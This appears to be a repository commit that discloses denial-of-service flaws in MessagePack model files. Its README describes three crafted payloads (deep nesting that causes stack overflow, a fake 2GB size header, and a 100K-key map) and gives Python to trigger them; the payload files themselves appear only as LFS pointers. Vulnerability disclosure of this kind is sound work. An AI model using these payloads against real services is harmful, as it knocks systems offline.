Upload folder using huggingface_hub

README.md

@@ -0,0 +1,22 @@
+# MessagePack Model File Vulnerability PoC
+
+## Vulnerability
+DoS via Deep Nesting Stack Overflow, OOM Bomb, and CPU Exhaustion in MessagePack model files
+
+## Files
+- `poc_deep_nest.msgpack` — 5,000 levels of nested maps, causes stack overflow on unpack
+- `poc_oom_bomb.msgpack` — 21 bytes, bin32 header claiming ~2GB allocation
+- `poc_huge_map.msgpack` — 100K key-value pairs, causes CPU/memory exhaustion
+- `benign.msgpack` — Clean file for comparison
+
+## Reproduce
+```python
+import msgpack
+# Stack overflow from deep nesting:
+with open('poc_deep_nest.msgpack', 'rb') as f:
+    msgpack.unpackb(f.read())  # RecursionError / crash
+
+# OOM from fake size header:
+with open('poc_oom_bomb.msgpack', 'rb') as f:
+    msgpack.unpackb(f.read())  # Attempts ~2GB allocation
+```

benign.msgpack

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b2c928f2229dcd53b33ab08a8aaa42637ed4fec702a01ee6173f07cf77c65893
+size 57

poc_deep_nest.msgpack

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cb5c9402cdd6f87499e2299f79f27ff5da87f11daa3ef56506d3800ebfcb443a
+size 10001

poc_huge_map.msgpack

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42a8ce722a91e2a45ad77c4702f52c5005ca73996fe883234de7908b8fca7190
+size 2177785

poc_oom_bomb.msgpack

@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b70da7b27238c0c92fc19c6adfa5c226bc4e1f6753d2e0d4fd6c881b1cca076c
+size 21